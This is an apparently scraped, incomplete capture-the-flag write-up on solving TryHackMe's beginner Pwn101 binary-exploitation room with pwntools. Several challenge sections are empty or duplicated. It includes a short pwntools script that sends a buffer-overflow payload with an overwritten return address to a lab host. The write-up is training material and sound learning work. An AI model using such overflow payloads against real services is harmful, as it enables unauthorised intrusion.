Table of Contents
Using Pwntools to Pwn the [Pwn101] Room on TryHackMe
Real quickly, I have to say that I don't have idols. I don't like the idea of idols. But, Hugsy and Fyodor (nmap), they're both idols of mine. I try to look up to them, for inspiration, keeping in mind that I should look at what they were doing, when they were at my experience level, so their skill set doesn't seem impossibly unobtainable.
Beginner level binary exploitation challenges.
Challenge 1 - pwn101
We're always going to start off by marking these binaries executable and basically running them. I'm not going to run a malware scan, because I'm in a dedicated environment. But, even in this situation, that's dumb of me. You should run a malware scan of any suspicious binary.
Ok... drops a shell and challenge is on port 9001... And, yes, some things are just this easy. Haha
Challenge 2 - pwn102
Challenge 3 - pwn102
Weaponize it for the server:
from pwn import *
p = remote("10.10.200.187","9003")
payload = b"A"*40 + p64(0x00401554) + p64(0x00401554)
Challenge 4 - pwn104 (nop sled)